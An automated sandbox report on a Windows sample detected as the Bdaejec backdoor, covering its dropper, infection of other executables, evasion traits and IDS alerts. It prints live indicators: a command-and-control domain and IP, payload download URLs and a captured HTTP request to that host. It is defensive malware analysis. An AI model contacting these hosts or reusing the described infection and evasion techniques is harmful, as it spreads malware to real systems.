Edit tour

Windows Analysis Report
aRxo3E278B.exe

Overview

General Information

Sample name:	aRxo3E278B.exe renamed because original name is a hash value
Original sample name:	2024-12-28_93bc13a5ccf808ac29d512748221ce1d.exe
Analysis ID:	1581654
MD5:	93bc13a5ccf808ac29d512748221ce1d
SHA1:	bff2313cab29f6301d4131eb2f211d4b26743a90
SHA256:	65214c3035c0f49f04a69d0c23f90f5b2b0135b706991ce5a9842fc6e4a077ed
Tags:	backdoorexeuser-zhuzhu0009
Infos:

Detection

Bdaejec

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Bdaejec

AI detected suspicious sample

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

aRxo3E278B.exe (PID: 2936 cmdline: "C:\Users\user\Desktop\aRxo3E278B.exe" MD5: 93BC13A5CCF808AC29D512748221CE1D)

rbQTKRDg.exe (PID: 5580 cmdline: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)

WerFault.exe (PID: 6032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 1384 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: rbQTKRDg.exe PID: 5580	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security

Suricata Signatures

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T12:25:01.831265+0100	2807908	1	Malware Command and Control Activity Detected	192.168.2.6	49707	44.221.84.105	799	TCP

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T12:25:00.452922+0100	2838522	1	Malware Command and Control Activity Detected	192.168.2.6	52159	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: aRxo3E278B.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k2.rar)lZ	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarp	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar9	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarel	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarV	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManager	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe

ReversingLabs: Detection: 97%

Multi AV Scanner detection for submitted file

Source: aRxo3E278B.exe	ReversingLabs: Detection: 97%
Source: aRxo3E278B.exe	Virustotal: Detection: 88%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: aRxo3E278B.exe

Joe Sandbox ML: detected

Source: aRxo3E278B.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe

Code function: 1_2_008F29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

1_2_008F29E2

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe

Code function: 1_2_008F2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_008F2B8C

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.6:52159 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.6:49707 -> 44.221.84.105:799

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49707 -> 799

Source: global traffic

TCP traffic: 192.168.2.6:49707 -> 44.221.84.105:799

Source: Joe Sandbox View

IP Address: 44.221.84.105 44.221.84.105

Source: global traffic

HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe

Code function: 1_2_008F1099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

1_2_008F1099

Source: global traffic

DNS traffic detected: DNS query: ddos.dnsnb8.net

Source: rbQTKRDg.exe, 00000001.00000003.2098676346.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, rbQTKRDg.exe, 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarV
Source: rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000EB7000.00000004.00000020.00020000.00000000.sdmp, rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar)lZ
Source: rbQTKRDg.exe, 00000001.00000002.2213695127.000000000286A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar9
Source: rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManager
Source: rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarel
Source: rbQTKRDg.exe, 00000001.00000002.2213695127.000000000286A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarp
Source: Amcache.hve.1.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Source: SciTE.exe.1.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_1b40cb0c-d

System Summary

PE file contains section with special chars

Source: MyProg.exe.1.dr

Static PE information: section name: Y|uR

PE file has a writeable .text section

Source: rbQTKRDg.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\aRxo3E278B.exe	Code function: 0_2_00417B71	0_2_00417B71
Source: C:\Users\user\Desktop\aRxo3E278B.exe	Code function: 0_2_00407320	0_2_00407320
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Code function: 1_2_008F6076	1_2_008F6076
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Code function: 1_2_008F6D00	1_2_008F6D00

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07

Source: C:\Users\user\Desktop\aRxo3E278B.exe

Code function: String function: 0040379C appears 32 times

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 1384

Source: MyProg.exe.1.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: aRxo3E278B.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: rbQTKRDg.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: rbQTKRDg.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: rbQTKRDg.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@5/11@1/1

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe

Code function: 1_2_008F119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

1_2_008F119F

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[1].rar

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5580

Source: C:\Users\user\Desktop\aRxo3E278B.exe

File created: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe

Jump to behavior

Source: C:\Users\user\Desktop\aRxo3E278B.exe

Command line argument: Z@

0_2_00405A30

Source: C:\Users\user\Desktop\aRxo3E278B.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: aRxo3E278B.exe	ReversingLabs: Detection: 97%
Source: aRxo3E278B.exe	Virustotal: Detection: 88%

Source: unknown	Process created: C:\Users\user\Desktop\aRxo3E278B.exe "C:\Users\user\Desktop\aRxo3E278B.exe"
Source: C:\Users\user\Desktop\aRxo3E278B.exe	Process created: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 1384
Source: C:\Users\user\Desktop\aRxo3E278B.exe	Process created: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Jump to behavior

Source: C:\Users\user\Desktop\aRxo3E278B.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe

Unpacked PE file: 1.2.rbQTKRDg.exe.8f0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Source: C:\Users\user\Desktop\aRxo3E278B.exe

Code function: 0_2_00409607 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

0_2_00409607

Source: initial sample

Static PE information: section where entry point is pointing to: wu

Source: aRxo3E278B.exe	Static PE information: section name: wu
Source: rbQTKRDg.exe.0.dr	Static PE information: section name: .aspack
Source: rbQTKRDg.exe.0.dr	Static PE information: section name: .adata
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.1.dr	Static PE information: section name: PELIB
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.1.dr	Static PE information: section name: u

Source: C:\Users\user\Desktop\aRxo3E278B.exe	Code function: 0_2_00416E7B push ebp; ret	0_2_00416E7E
Source: C:\Users\user\Desktop\aRxo3E278B.exe	Code function: 0_2_00416E85 push 00000000h; ret	0_2_00417296
Source: C:\Users\user\Desktop\aRxo3E278B.exe	Code function: 0_2_004037E1 push ecx; ret	0_2_004037F4
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Code function: 1_2_008F1638 push dword ptr [008F3084h]; ret	1_2_008F170E
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Code function: 1_2_008F600A push ebp; ret	1_2_008F600D
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Code function: 1_2_008F2D9B push ecx; ret	1_2_008F2DAB
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Code function: 1_2_008F6014 push 008F14E1h; ret	1_2_008F6425

Source: aRxo3E278B.exe	Static PE information: section name: wu entropy: 6.935419512952454
Source: rbQTKRDg.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ entropy: 6.934288105896135
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR entropy: 6.9347317483471365
Source: SciTE.exe.1.dr	Static PE information: section name: u entropy: 6.93455810695625

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\Desktop\aRxo3E278B.exe	File created: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49707 -> 799

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
